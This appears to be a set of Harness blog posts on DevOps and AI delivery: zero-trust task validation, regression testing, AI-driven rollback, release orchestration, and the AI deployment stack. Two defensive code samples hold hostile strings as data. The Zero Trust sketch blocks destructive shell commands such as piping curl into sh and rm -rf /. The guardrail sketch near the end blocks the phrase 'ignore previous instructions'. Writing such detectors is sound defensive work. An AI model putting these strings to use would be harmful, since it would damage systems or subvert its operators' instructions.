But in regulated environments, the true achievement lies elsewhere. It lies in building a platform where developers move quickly, security remains embedded within the delivery workflow, governance is enforced automatically, and production environments remain protected from uncontrolled change.
That is not just CI/CD. That is platform engineering done right.


For the world’s largest financial institutions, places like Citi and National Australia Bank, shipping code fast is just part of the job. But at that scale, speed is nothing without a rock-solid security foundation. It’s the non-negotiable starting point for every release.
Most Harness users believe they are fully covered by our fine-grained Role-Based Access Control (RBAC) and Open Policy Agent (OPA). These are critical layers, but they share a common assumption: they trust the user or the process once the initial criteria are met. If you let someone control and execute a shell script, you’ve trusted them to a great extent.
But what happens when the person with the "right" permissions decides to go rogue? Or when a compromised account attempts to inject a malicious script into a trusted pipeline?
Harness is changing the security paradigm by moving beyond Policy as Code to a true Zero Trust model for your delivery infrastructure.
Traditional security models focus on the "Front Door." Once an employee is authenticated and their role is verified, the system trusts their actions. In a modern CI/CD environment, this means an engineer with "Edit" and "Execute" rights can potentially run arbitrary scripts on your infrastructure.
If that employee goes rogue or their credentials are stolen, RBAC won't stop them. OPA can control whether shell scripts are allowed at all, but it often struggles to parse the intent of a custom shell script in real-time.
The reality is that verify-at-the-door is a legacy mindset. We need to verify at execution time. CI/CD platforms are a frequent supply-chain target. The recent attack against the Checkmarx GitHub Action has been a painful reminder of the lesson the SolarWinds fiasco should have taught the industry.
Harness Zero Trust is a new architectural layer that acts as a mandatory "interruption" service at the most critical point: the Harness Delegate (our lightweight runner in your infrastructure).
Instead of the Delegate simply executing tasks authorized by the control plane, it now operates on a "Never Trust, Always Verify" basis.
When Zero Trust is enabled, the Harness Delegate pauses before executing any task. It sends the full execution context to a Zero Trust Validator, a service hosted and controlled by your security team.
This context includes:
The Delegate waits a moment. Only if the validator returns a "True" signal does the task proceed. If the signal is "False," the execution is killed instantly.
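To make the flow concrete, here is a minimal sketch of what a validator's decision logic could look like. It is an illustration under stated assumptions, not the Harness API: the `ExecutionContext` fields, the `validate` and `run_task` names, and the deny patterns are all hypothetical, and a real validator would apply your security team's own rules.

```python
import re
from dataclasses import dataclass

# Illustrative deny patterns only; not a complete or recommended rule set.
BLOCKED_PATTERNS = [
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh"),  # piping a download into a shell
    re.compile(r"\brm\s+-rf\s+/(\s|$)"),      # deleting the filesystem root
]


@dataclass(frozen=True)
class ExecutionContext:
    user: str      # hypothetical field: who triggered the task
    pipeline: str  # hypothetical field: pipeline identifier
    script: str    # hypothetical field: script about to be executed


def validate(ctx: ExecutionContext) -> bool:
    """Return True to let the task proceed, False to stop it."""
    return not any(p.search(ctx.script) for p in BLOCKED_PATTERNS)


def run_task(ctx: ExecutionContext) -> str:
    """Delegate-side flow: ask the validator first, execute only on True."""
    if not validate(ctx):
        return "blocked"
    return "executed"  # placeholder for actually running the task


print(run_task(ExecutionContext("alice", "deploy", "kubectl apply -f deploy.yaml")))
print(run_task(ExecutionContext("mallory", "deploy", "curl https://evil.example/x.sh | sh")))
```

Pattern matching is the simplest possible check. Because the validator is a service you control, the same hook could just as well consult an allowlist of approved script hashes or an internal risk engine.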
By moving validation to the Delegate level, we provide a "Last Line of Defense" that hits several key enterprise requirements:
We built this capability alongside some of the world's most regulated institutions to ensure it doesn't become a bottleneck. It’s designed to be a silent guardian. It shuts down the 1% of rogue actions while the other 99% of your engineers continue to innovate at high velocity.
The bottom line: at Harness, we believe that the promise of AI-accelerated coding must be met with an equally advanced delivery safety net. We’re building out that safety net every day. Zero Trust is the next piece.


A financial services company ships code to production 47 times per day across 200+ microservices. Their secret isn't running fewer tests; it's running the right tests at the right time.
Modern regression testing must evolve beyond brittle test suites that break with every change. It requires intelligent test selection, process parallelization, flaky test detection, and governance that scales with your services.
Harness Continuous Integration brings these capabilities together, using machine learning to detect deployment anomalies and automatically roll back failures before they impact customers. This framework covers definitions, automation patterns, and scale strategies that turn regression testing into an operational advantage. Ready to deliver faster without fear?
Managing updates across hundreds of services makes regression testing a daily reality, not just a testing concept. Regression testing in CI/CD ensures that new code changes don’t break existing functionality as teams ship faster and more frequently. In modern microservices environments, intelligent regression testing is the difference between confident daily releases and constant production risk.
These terms often get used interchangeably, but they serve different purposes in your pipeline. Understanding the distinction helps you avoid both redundant test runs and dangerous coverage gaps.
In practice, you run them sequentially: retest the fix first, then run regression suites scoped to the affected services. For microservices environments with hundreds of interdependent services, this sequencing prevents cascade failures without creating deployment bottlenecks.
The challenge is deciding which regression tests to run. A small change to one service might affect three downstream dependencies, or even thirty. This is where governance rules help. You can set policies that automatically trigger retests on pull requests and broader regression suites at pre-production gates, scoping coverage based on change impact analysis rather than gut feel.
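Change impact analysis can be as simple as walking a service dependency graph. The sketch below assumes you can export a map of which services call which; the service names and the `impacted_services` helper are hypothetical. It returns the changed service plus everything that transitively depends on it, which is the set whose regression suites should run.

```python
from collections import deque

# Hypothetical dependency map: service -> services it calls.
DEPENDS_ON = {
    "checkout": ["payments", "inventory"],
    "payments": ["ledger"],
    "inventory": [],
    "ledger": [],
    "reports": ["ledger"],
}


def impacted_services(changed: str, depends_on: dict[str, list[str]]) -> set[str]:
    """Return the changed service plus every service that transitively depends on it."""
    # Invert the graph: service -> services that call it.
    dependents: dict[str, set[str]] = {}
    for svc, deps in depends_on.items():
        for dep in deps:
            dependents.setdefault(dep, set()).add(svc)

    # Breadth-first walk over the inverted graph.
    seen = {changed}
    queue = deque([changed])
    while queue:
        current = queue.popleft()
        for svc in dependents.get(current, ()):
            if svc not in seen:
                seen.add(svc)
                queue.append(svc)
    return seen


print(sorted(impacted_services("ledger", DEPENDS_ON)))
```

A change to `ledger` pulls in `payments`, `reports`, and `checkout`, while a change to `checkout` affects only itself, so the scope of each regression run follows the graph rather than gut feel.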
To summarize, regression testing checks that existing functionality still works after a change. Retesting verifies that a specific bug fix works as intended. Both are essential, but they serve different purposes in CI/CD pipelines.
The regression testing process works best when it matches your delivery cadence and risk tolerance. Smart timing prevents bottlenecks while catching regressions before they reach users.
This layered approach balances speed with safety. Developers get immediate feedback while production deployments include comprehensive verification. Next, we'll explore why this structured approach becomes even more critical in microservices environments where a single change can cascade across dozens of services.
Modern enterprises managing hundreds of microservices face three critical challenges: changes that cascade across dependent systems, regulatory requirements demanding complete audit trails, and operational pressure to maintain uptime while accelerating delivery.
A single API change can break dozens of downstream services you didn't know depended on it.
Financial services, healthcare, and government sectors require documented proof that tests were executed and passed for every promotion.
Catching regressions before deployment saves exponentially more than fixing them during peak traffic.
With the stakes clear, the next question is which techniques to apply. Modern CI/CD demands regression testing that balances thoroughness with velocity. The most effective techniques fall into three categories: selective execution, integration safety, and production validation, with a few pragmatic variants you’ll use day-to-day.
These approaches work because they target specific failure modes. Smart selection outperforms broad coverage when you need both reliability and rapid feedback.
Managing regression testing across 200+ microservices doesn't require days of bespoke pipeline creation. Harness Continuous Integration provides the building blocks to transform testing from a coordination nightmare into an intelligent safety net that scales with your architecture.
Step 1: Generate pipelines with context-aware AI. Start by letting Harness AI build your pipelines based on industry best practices and the standards within your organization. The approach is interactive, and you can refine the pipelines with Harness as your guide. Ensure that the standard scanners are run.
Step 2: Codify golden paths with reusable templates. Create Harness pipeline templates that define when and how regression tests execute across your service ecosystem. These become standardized workflows embedding testing best practices while giving developers guided autonomy. When security policies change, update a single template and watch it propagate to all pipelines automatically.
Step 3: Enforce governance with Policy as Code. Use OPA policies in Harness to enforce minimum coverage thresholds and required approvals before production promotions. This ensures every service meets your regression standards without manual oversight.
With automation in place, the next step is avoiding the pitfalls that derail even well-designed pipelines.
Regression testing breaks down when flaky tests erode trust and slow suites block every pull request. These best practices focus on governance, speed optimization, and data stability.
Regression testing in CI/CD enables fast, confident delivery when it’s selective, automated, and governed by policy. With the right strategies, it shifts from a release bottleneck to an automated protection layer: selective test prioritization, automated regression gates, and policy-backed governance create confidence without sacrificing speed.
The future belongs to organizations that make regression testing intelligent and seamless. When regression testing becomes part of your deployment workflow rather than an afterthought, shipping daily across hundreds of services becomes the norm.
Ready to see how context-aware AI, OPA policies, and automated test intelligence can accelerate your releases while maintaining enterprise governance? Explore Harness Continuous Integration and discover how leading teams turn regression testing into their competitive advantage.
These practical answers address timing, strategy, and operational decisions platform engineers encounter when implementing regression testing at scale.
Run targeted regression subsets on every pull request for fast feedback. Execute broader suites on merges to the main branch, with parallelization. Schedule comprehensive regression testing before production deployments, then use core end-to-end tests as synthetic testing during canary rollouts to catch issues under live traffic.
Retesting validates a specific bug fix — did the payment timeout issue get resolved? Regression testing ensures that the fix doesn’t break related functionality like order processing or inventory updates. Run retests first, then targeted regression suites scoped to affected services.
There's no universal number. Coverage requirements depend on risk tolerance, service criticality, and regulatory context. Focus on covering critical user paths and high-risk integration points rather than chasing percentage targets. Use policy-as-code to enforce minimum thresholds where compliance requires it, and supplement test coverage with AI-powered deployment verification to catch regressions that test suites miss.
No. Full regression on every commit creates bottlenecks. Use change-based test selection to run only tests affected by code modifications. Reserve comprehensive suites for nightly runs or pre-release gates. This approach maintains confidence while preserving velocity across your enterprise delivery pipelines.
Quarantine flaky tests immediately, rather than letting them block pipelines. Tag unstable tests, move them to separate jobs, and set clear SLAs for fixes. Use failure strategies like retry logic and conditional execution to handle intermittent issues while maintaining deployment flow.
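One common heuristic for spotting flaky tests is to look for tests that both passed and failed on the same commit, since the code did not change between runs. The sketch below assumes a run history of `(test, commit, passed)` tuples; the record shape and the helper names are hypothetical, and this is only one of several possible detection rules.

```python
from collections import defaultdict

# Hypothetical run history records: (test name, commit SHA, passed?)
History = list[tuple[str, str, bool]]


def find_flaky(history: History) -> set[str]:
    """Treat a test as flaky if it both passed and failed on the same commit."""
    outcomes: dict[tuple[str, str], set[bool]] = defaultdict(set)
    for test, commit, passed in history:
        outcomes[(test, commit)].add(passed)
    return {test for (test, _), seen in outcomes.items() if len(seen) == 2}


def split_suite(tests: list[str], flaky: set[str]) -> tuple[list[str], list[str]]:
    """Split tests into a blocking job and a non-blocking quarantine job."""
    blocking = [t for t in tests if t not in flaky]
    quarantined = [t for t in tests if t in flaky]
    return blocking, quarantined


history = [
    ("test_login", "abc", True),
    ("test_login", "abc", False),  # same commit, different outcome
    ("test_pay", "abc", False),
    ("test_pay", "def", True),     # different commits: a real fix, not flakiness
    ("test_cart", "abc", True),
]
flaky = find_flaky(history)
print(split_suite(["test_login", "test_pay", "test_cart"], flaky))
```

The quarantined list still runs, just in a job that does not block the pipeline, so the signal is preserved while the fix is tracked against its SLA.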
Treat test code with the same rigor as application code. That means version control, code reviews, and regular cleanup of obsolete tests. Use policy-as-code to enforce coverage thresholds across teams, and leverage pipeline templates to standardize how regression suites execute across your service portfolio.
Eight years ago, we shipped Continuous Verification (CV) to solve one of the most miserable parts of a great engineer’s job: babysitting deployments.
The idea was simple but powerful. At 3:00 AM, your best engineers shouldn't be staring at dashboards waiting to see if a release went sideways. CV was designed to think like those engineers, watching your APM metrics, scanning your logs, and making the call for you. Roll forward or roll back, automatically, based on what the data actually said.
It worked. Customers loved it. Hundreds of teams stopped losing sleep over deployments.
But somewhere along the way, we noticed a new problem creeping in: setting up CV had become its own burden.
To get value from Continuous Verification, you had to know what to look for. Which metrics matter for this service? Which log patterns indicate trouble? Which thresholds separate a blip from a real incident?
When we talk to teams trying to use Argo Rollouts and set up automatic verification with its analysis templates, we hear that they hit the same challenges.
For teams with deep observability expertise, this was fine. For everyone else—and honestly, for experienced teams onboarding new services—it added friction that shouldn't exist. We’d solved the hardest part of deployments, but we’d left engineers with a new "homework assignment" just to get started.
That’s what AI Verification & Rollback is designed to fix.
AI Verification & Rollback builds directly on the CV foundation you already trust, but adds a layer of intelligence before the analysis even begins. Instead of requiring you to define your metrics and log queries upfront, the system queries your observability provider—via MCP server—at the moment of deployment to determine what actually matters for the service you just deployed.
What that means in practice:
At our user conference six months ago, we showed this running live—triggering a real deployment, watching the MCP server query Dynatrace for relevant signals, and walking through a live failure analysis that caught a bad release within minutes. The response was immediate. Engineers got it instantly, because it matched how they already think about post-deploy monitoring.
We’ve spent the past six months hardening what we showed you. A few highlights:
We're not declaring CV legacy today. AI Verification & Rollback is not yet a full replacement for traditional Continuous Verification across all use cases and customer configurations. CV remains the right choice for many teams, and we're committed to supporting it.
Bottom line: AI V&R is ready for many teams to use. It's available now, and for teams setting up verification for the first time—or looking to reduce the operational overhead of maintaining verification configs—it's the faster, smarter path forward.
The takeaway here is simple: If you've been putting off setting up Continuous Verification because of the configuration overhead, this is the version you were waiting for.
Ready to stop babysitting your releases? Drop the AI V&R step into your next pipeline and see what it finds.
How is your team currently handling the "3:00 AM dashboard stare"—and how much time would you save if the pipeline just told you why it rolled back?


AI has officially made writing code cheap.
Your developers are shipping more changes, across more microservices, more frequently than ever before. If you’re a developer, it feels like a golden age.
But for the Release Engineer? This isn't necessarily a celebration; it’s a scaling nightmare.
We’re currently seeing what I call the "AI delivery gap." It’s that uncomfortable space between the breakneck speed at which we can now generate code and the manual, spreadsheet-driven processes we still use to actually release it.
The reality is that while individual CI/CD pipelines might be automated, the coordination between them remains a stubbornly human bottleneck. We’ve automated the "how" of shipping code, but we’re still stuck in the Dark Ages when it comes to the "when" and "with whom."
Today, we are introducing Harness Release Orchestration alongside four other capabilities that ensure confident releases. Release Orchestration is designed to transform the release management process from a fragmented, manual effort into a standardized, visible, and scalable operation.

Most release engineers I talk to spend about 40% of their time "chasing humans for status." You’re checking Slack threads for sign-offs, updating Confluence pages, and obsessively watching spreadsheets to ensure Team A’s service doesn't break Team B’s dependency. (And let’s be honest, it usually does anyway.)
We could call it a team sport, but it’s really a multi-team sport. Teams from multiple services and functions need to come together to deliver a big release.
If we rely on a person to coordinate, we can’t move fast enough.
Harness Release Orchestration moves beyond the single pipeline. It introduces a process-based framework that acts as your release "blueprint."
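One way to picture a release blueprint is as a dependency graph of steps, where each step lists what must finish before it can start. The sketch below is a generic illustration using Python's standard `graphlib` module, not a description of how Harness implements it. The step names and the `release_waves` helper are hypothetical.

```python
from graphlib import CycleError, TopologicalSorter

# Hypothetical blueprint: release step -> steps that must finish first.
BLUEPRINT = {
    "db-migration": set(),
    "payments-service": {"db-migration"},
    "inventory-service": {"db-migration"},
    "checkout-service": {"payments-service"},
    "security-signoff": {"payments-service", "checkout-service"},
    "enable-feature-flag": {"security-signoff"},
}


def release_waves(blueprint: dict[str, set[str]]) -> list[list[str]]:
    """Group steps into waves; every step in a wave can run in parallel."""
    sorter = TopologicalSorter(blueprint)
    sorter.prepare()  # raises CycleError if the blueprint has a dependency cycle
    waves = []
    while sorter.is_active():
        ready = sorted(sorter.get_ready())
        waves.append(ready)
        sorter.done(*ready)
    return waves


for number, wave in enumerate(release_waves(BLUEPRINT), start=1):
    print(number, wave)
```

Encoding the order this way replaces the spreadsheet question of who goes next with a computed answer, and a circular dependency between teams surfaces as an error before release night instead of during it.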
Release management software isn’t an entirely new idea. It’s been tried before, but never widely adopted. The industry went wrong by building separate tools for continuous delivery and release orchestration.
With separate tools, you incur integration overhead, have multiple places to look, and end up with awkward handoffs between them.
We’ve built ours alongside our CD experience, so everything is as seamless and fast as possible. Yes, this is for releases that are more complex than a simple microservice, which the app team delivers on their own. No, that doesn’t mean introducing big processes and standalone tools.
Here’s the “gotcha”: the biggest barrier to adopting a new release tool is the hassle of migrating. You likely have years of proven workflows documented in SharePoint/Confluence, in early-release management tools like XL Release, or in the fading memory of that one person who isn't allowed to retire.
Harness AI now handles the heavy lifting. Our AI Process Ingestion can instantly generate a comprehensive release process from a simple natural-language prompt, existing documentation, or export from a tool.
What used to take months of manual configuration now takes seconds. Simply put, we’re removing the friction of modernization.
For the Release Engineer, the goal is leverage. You shouldn't need to perform heroics every Friday night to ensure a successful release. (Though if you enjoy the adrenaline of a 2:00 AM war room, I suppose I can’t stop you.)
Harness Release Orchestration creates a standardized release motion that scales with AI-driven output. It allows you to move from being a "release waiter" to a "release architect."
AI made writing code cheap. Harness makes releasing it safe, scalable, and sustainable.


Engineering teams are generating more shippable code than ever before — and today, Harness is shipping five new capabilities designed to help teams release confidently. AI coding assistants lowered the barrier to writing software, and the volume of changes moving through delivery pipelines has grown accordingly. But the release process itself hasn't kept pace.
The evidence shows up in the data. In our 2026 State of DevOps Modernization Report, we surveyed 700 engineering teams about what AI-assisted development is actually doing to their delivery. The finding stands out: while 35% of the most active AI coding users are already releasing daily or more, those same teams have the highest rate of deployments needing remediation (22%) and the longest MTTR at 7.6 hours.
This is the velocity paradox: the faster teams can write code, the more pressure accumulates at release time, where the process hasn't changed nearly as much as the tooling that feeds it.
The AI Delivery Gap
What changed is well understood. For years, the bottleneck in software delivery was writing code. Developers couldn't produce changes fast enough to stress the release process. AI coding assistants changed that. Teams are now generating more change across more services, more frequently than before — but the tools for releasing that change are largely the same.
In the past, DevSecOps vendors built entire separate products to coordinate multi-team, multi-service releases. That made sense when CD pipelines were simpler. It doesn't make sense now. At AI speed, a separate tool means another context switch, another approval flow, and another human-in-the-loop at exactly the moment you need the system to move on its own.
The tools that help developers write code faster have created a delivery gap that only widens as adoption grows.
Today Harness is releasing five capabilities, all natively integrated into Continuous Delivery. Together, they cover the full arc of a modern release: coordinating changes across teams and services, verifying health in real time, managing schema changes alongside code, and progressively controlling feature exposure.
Release Orchestration replaces Slack threads, spreadsheets, and war-room calls that still coordinate most multi-team releases. Services and the teams supporting them move through shared orchestration logic with the same controls, gates, and sequence, so a release behaves like a system rather than a series of handoffs. And everything is seamlessly integrated with Harness Continuous Delivery, rather than in a separate tool.
AI-Powered Verification and Rollback connects to your existing observability stack, automatically identifies which signals matter for each release, and determines in real time whether a rollout should proceed, pause, or roll back. Most teams have rollback capability in theory. In practice it's an emergency procedure, not a routine one. Ancestry.com made it routine and saw a 50% reduction in overall production outages, with deployment-related incidents dropping significantly.
Database DevOps, now with Snowflake support, brings schema changes into the same pipeline as application code, so the two move together through the same controls with the same auditability. If a rollback is needed, the application and database schema can roll back together seamlessly. This matters especially for teams building AI applications on warehouse data, where schema changes are increasingly frequent and consequential.
Improved pipeline and policy support for feature flags and experimentation lets teams deploy safely and release progressively to the right users, even as AI-generated code increases the number of releases. Teams can quickly measure impact on technical and business metrics, and stop or roll back when results are off track. All of this happens within the familiar Harness user interface they already use for CI/CD.
Warehouse-Native Feature Management and Experimentation lets teams test features and measure business impact directly with data warehouses like Snowflake and Redshift, without ETL pipelines or shadow infrastructure. This way they can keep PII and behavioral data inside governed environments for compliance and security.
These aren't five separate features. They're one answer to one question: can we safely keep going at AI speed?
Traditional CD pipelines treat deployment as the finish line. The model Harness is building around treats it as one step in a longer sequence: application and database changes move through orchestrated pipelines together, verification checks real-time signals before a rollout continues, features are exposed progressively, and experiments measure actual business outcomes against governed data.
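The sequence described here, progressive exposure gated by verification, can be sketched in a few lines. This is a simplified illustration under stated assumptions: the verdict names mirror the proceed, pause, and roll back outcomes mentioned earlier, the error-rate ratios are arbitrary example thresholds, and `verify` and `progressive_rollout` are hypothetical helpers rather than Harness functions.

```python
from enum import Enum


class Verdict(Enum):
    PROCEED = "proceed"
    PAUSE = "pause"
    ROLL_BACK = "roll_back"


def verify(baseline_error_rate: float, current_error_rate: float,
           pause_ratio: float = 1.5, rollback_ratio: float = 3.0) -> Verdict:
    """Compare the new version's error rate against the baseline.

    The ratios are illustrative thresholds, not recommended values.
    """
    # Avoid division by zero when the baseline has no errors at all.
    floor = max(baseline_error_rate, 1e-6)
    ratio = current_error_rate / floor
    if ratio >= rollback_ratio:
        return Verdict.ROLL_BACK
    if ratio >= pause_ratio:
        return Verdict.PAUSE
    return Verdict.PROCEED


def progressive_rollout(steps: list[int], observed: dict[int, float],
                        baseline: float) -> tuple[int, Verdict]:
    """Walk through exposure percentages, stopping at the first non-PROCEED verdict.

    Returns the exposure percentage reached and the final verdict
    (0% exposure if the rollout was rolled back).
    """
    reached = 0
    for pct in steps:
        verdict = verify(baseline, observed[pct])
        if verdict is Verdict.ROLL_BACK:
            return 0, verdict
        if verdict is Verdict.PAUSE:
            return pct, verdict
        reached = pct
    return reached, Verdict.PROCEED


# Hypothetical observed error rates at each exposure step.
print(progressive_rollout([5, 25, 100], {5: 0.01, 25: 0.04, 100: 0.01}, baseline=0.01))
```

A single error-rate ratio stands in for the richer set of signals a real verification step would examine. The point of the sketch is the control flow: exposure only widens after each check passes.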
A release isn't complete when the pipeline finishes. It's complete when the system has confirmed the change is healthy, the exposure is intentional, and the outcome is understood.
That shift from deployment to verified outcome is what Harness customers say they need most. "AI has made it much easier to generate change, but that doesn't mean organizations are automatically better at releasing it," said Marc Pearce, Head of DevOps at Intelliflo. "Capabilities like these are exactly what teams need right now. The more you can standardize and automate that release motion, the more confidently you can scale."
The real shift here is operational. The work of coordinating a release today depends heavily on human judgment, informal communication, and organizational heroics. That worked when the volume of change was lower. As AI development accelerates, it's becoming the bottleneck.
The release process needs to become more standardized, more repeatable, and less dependent on any individual's ability to hold it together at the moment of deployment. Automation doesn't just make releases faster. It makes them more consistent, and consistency is what makes scaling safe.
Implementing Harness helped Ancestry.com reach 99.9% uptime, cutting outages in half while tripling deployment velocity.
At Speedway Motors, progressive delivery and 20-second rollbacks enabled a move from biweekly releases to multiple deployments per day, with enough confidence to run five to ten feature experiments per sprint.
AI made writing code cheap. Releasing that code safely, at scale, is still the hard part.
Harness Release Orchestration, AI-Powered Verification and Rollback, Database DevOps, Warehouse-Native Feature Management and Experimentation, and Improved Pipeline and Policy Support for FME are available now. Learn more and book a demo.


For the past few years, the narrative around Artificial Intelligence has been dominated by what I like to call the "magic box" illusion. We assumed that deploying AI simply meant passing a user's question through an API to a Large Language Model (LLM) and waiting for a brilliant answer.
Today, we are building systems that can reason, access private databases, use tools, and (hopefully) correct their own mistakes. However, while AI code generation tools are helping us write more code than ever, we are actually getting worse at shipping it. Google's DORA research found that delivery throughput is decreasing by 1.5% and stability is worsening by 7.5%. Deploying AI is no longer a machine learning experiment; it's one of the most complex system integration challenges in modern software engineering.
That's why integrated CI/CD is no longer optional for AI deployment—it's the foundation. As teams adopt platforms like Harness Continuous Integration and Harness Continuous Delivery, testing and release orchestration shift from isolated checkpoints to continuous safeguards that protect quality and safety at every layer of the AI stack.
Most definitions of AI deployment are stuck in the "model era." They describe deployment as taking a trained model, wrapping it in an API, and integrating it into a single application to make predictions.
That description is technically accurate—but strategically wrong.
In 2026, AI deployment means:
Integrating a full AI application stack—models, prompts, data pipelines, RAG components, agents, tools, and guardrails—into your production environment so it can safely power real user workflows and business decisions.
You're not just deploying "a model." You are deploying the instructions that define the AI's behavior, the engines (LLMs and other models) that do the reasoning, the data and embeddings that feed those engines context, the RAG and orchestration code that glue everything together, the agents and tools that let AI take actions in your systems, and the guardrails and policies that keep it all safe, compliant, and affordable.
Classic "model deployment" was a single component behind a predictable API. Modern AI deployment is end‑to‑end, cross‑cutting, and deeply entangled with your existing software delivery process.
If you want a great reference for the more traditional view, IBM's overview of model deployment is a good baseline. But in this article, we're going to go beyond that to talk about the compound system you are actually shipping today.
The paradox of this moment is simple: coding has sped up, but delivery has slowed down.
AI coding assistants generate scaffolding in seconds. Platform teams spin up infrastructure on demand. Product leaders are under pressure to add "AI" to every experience. But in many organizations, the actual path from "we built it" to "it's safely in front of customers" is becoming more fragile, not less.
There are a few reasons for this:
The result is what many teams are feeling right now: shipping AI features feels risky, brittle, and slow, even as the pressure to "move faster" keeps rising.
To fix that, we have to start with the stack itself.
To understand how to deploy AI, you have to stop treating it as a single entity. The modern AI application is a compound system of highly distinct, interdependent layers. If any single component in this stack fails or drifts, the entire application degrades.
A prompt is no longer just a text string typed into a chat window; it is the source code that dictates the behavior and persona of your application.
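If a prompt is source code, it can be versioned like source code. The sketch below is one way to do that, not a prescribed approach: the `PromptVersion` class and its fields are hypothetical. It derives a short content hash from the template so every response can be tied to the exact prompt text that produced it.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class PromptVersion:
    """A prompt template treated as a versioned artifact (hypothetical shape)."""
    name: str
    template: str

    @property
    def digest(self) -> str:
        # Any change to the template text, however small, changes the digest.
        return hashlib.sha256(self.template.encode("utf-8")).hexdigest()[:12]

    def render(self, **variables: str) -> str:
        """Fill the template's placeholders with runtime values."""
        return self.template.format(**variables)


support_v1 = PromptVersion("support", "You are a polite support agent. Question: {question}")
support_v2 = PromptVersion("support", "You are a concise support agent. Question: {question}")
```

Here `support_v1.digest` and `support_v2.digest` differ even though only one word changed, which is exactly the kind of edit that can shift application behavior without touching any application code.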
The LLM is the reasoning engine. It has vast general knowledge but zero awareness of your company’s proprietary data.
An AI's output is only as reliable as the context it is given. To make an LLM useful, it needs a continuous feed of your company’s internal data.
RAG is not a model; it is a separate software architecture deployed to act as the LLM's research assistant.
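To show why RAG is software rather than a model, here is a deliberately small sketch of the retrieve-then-prompt flow. It rests on a big assumption: word overlap stands in for the embedding search a real system would run against a vector database. The function names and sample documents are hypothetical.

```python
import re


def tokenize(text: str) -> set[str]:
    """Lowercase the text and split it into a set of alphanumeric words."""
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def retrieve(query: str, documents: list[str], k: int = 2) -> list[str]:
    """Return the k documents sharing the most words with the query."""
    query_words = tokenize(query)
    ranked = sorted(documents, key=lambda d: len(query_words & tokenize(d)), reverse=True)
    return ranked[:k]


def build_prompt(query: str, documents: list[str], k: int = 2) -> str:
    """Assemble the text an LLM would receive: retrieved context, then the question."""
    context = "\n".join(f"- {doc}" for doc in retrieve(query, documents, k))
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"


docs = [
    "Refunds are processed within 5 business days.",
    "Our headquarters is in Austin.",
    "Refunds require the original receipt.",
]
prompt = build_prompt("How are refunds processed?", docs)
```

Nothing in this code is a model. It is ordinary logic that can have ordinary bugs, which is why it needs the same testing and release discipline as the rest of your software.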
If RAG is a researcher, an AI Agent is an employee. Agents are LLMs given access to external tools. Instead of just answering a question, an agent can formulate a plan, search the web, and execute code.
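A minimal sketch of the tool-execution side of an agent follows. It assumes the plan has already been produced by an LLM (not shown) as a list of tool calls, and it only runs tools that were explicitly registered. The tool names and the `run_plan` function are hypothetical, and the tools are stubs.

```python
from typing import Callable

# Registry of the only tools this agent may call (stub implementations).
TOOLS: dict[str, Callable[[str], str]] = {
    "search": lambda query: f"results for {query!r}",
    "word_count": lambda text: str(len(text.split())),
}


def run_plan(plan: list[tuple[str, str]]) -> list[str]:
    """Execute each (tool_name, argument) step, refusing unregistered tools."""
    outputs = []
    for tool_name, argument in plan:
        tool = TOOLS.get(tool_name)
        if tool is None:
            raise PermissionError(f"tool {tool_name!r} is not registered")
        outputs.append(tool(argument))
    return outputs
```

The registry is the part that matters for deployment: adding or changing a tool changes what the agent can do in your systems, so it deserves the same review as any other release.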
You cannot expose a raw LLM or an autonomous agent to the public, or even to internal employees, without armor. Because AI is non-deterministic, traditional software security falls short. Modern AI deployment requires distinct "Guardrails as Code".
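As a rough illustration of an input guardrail expressed as code, the sketch below screens user text before it reaches a model. The two patterns and the `check_input` function are hypothetical and far from complete. Real guardrails typically combine many more checks, often including model-based classifiers.

```python
import re
from dataclasses import dataclass

# Hypothetical rules: one prompt-injection phrase and one simple PII pattern.
BLOCKED_PATTERNS = {
    "prompt_injection": re.compile(r"ignore (all )?(previous|prior) instructions", re.IGNORECASE),
    "email_address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
}


@dataclass(frozen=True)
class GuardrailResult:
    allowed: bool
    violations: tuple[str, ...]


def check_input(user_text: str) -> GuardrailResult:
    """Block the request if any rule matches, and report which rules fired."""
    violations = tuple(
        name for name, pattern in BLOCKED_PATTERNS.items() if pattern.search(user_text)
    )
    return GuardrailResult(allowed=not violations, violations=violations)
```

Because the rules live in a file rather than in someone's head, they can be reviewed, versioned, and tested like any other change.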
These kinds of controls are a natural fit for policy‑as‑code engines and CI/CD gates. With something like Harness Continuous Delivery & GitOps, you can enforce Open Policy Agent (OPA) rules at deployment time—ensuring that applications with missing or misconfigured input guardrails simply never make it to production.
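The deployment-time check described above can be sketched in plain Python. This is a stand-in for the idea only: a real OPA policy would be written in Rego, and the manifest layout and the `policy_violations` function here are hypothetical.

```python
# Guardrail layers every deployable AI application must declare (assumed list).
REQUIRED_GUARDRAILS = ("input", "output", "action")


def policy_violations(manifest: dict) -> list[str]:
    """Return the reasons a deployment manifest should be rejected, if any."""
    guardrails = manifest.get("guardrails", {})
    problems = []
    for layer in REQUIRED_GUARDRAILS:
        config = guardrails.get(layer)
        if config is None:
            problems.append(f"missing {layer} guardrail")
        elif not config.get("enabled", False):
            problems.append(f"{layer} guardrail is disabled")
    return problems


manifest = {"guardrails": {"input": {"enabled": False}, "output": {"enabled": True}}}
problems = policy_violations(manifest)
```

A pipeline gate would fail the deployment whenever `problems` is non-empty, so a missing or disabled guardrail is caught before production rather than after an incident.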
Understanding the stack reveals the ultimate challenge: The Cascade Effect. In traditional software, a database error throws a clean error code. In an AI application, a bug in the data pipeline silently ruins everything downstream. This is why deployment cannot be disjointed. It requires rigorous Release Orchestration.
For years, we've been obsessed with specialized silos: MLOps, LLMOps, AgentOps. But a vital realization is sweeping the enterprise: the time of siloed, specialized AI operations tools is coming to an end.
The future belongs to unified release management. The organizations that succeed will not be the ones with the smartest standalone AI models, but the ones who master the orchestration required to deploy and evolve those models, alongside everything else they ship, safely, efficiently, and continuously.
If you want a platform that brings semantic testing, progressive rollouts, and coordinated AI releases into your day-to-day workflows, Harness Continuous Integration and Harness Continuous Delivery were built for this.
What is AI deployment?
AI deployment is the process of integrating AI systems (models, prompts, data pipelines, RAG architectures, agents, tools, and guardrails) into production environments so they can safely power real applications and business workflows.
How is AI deployment different from traditional model deployment?
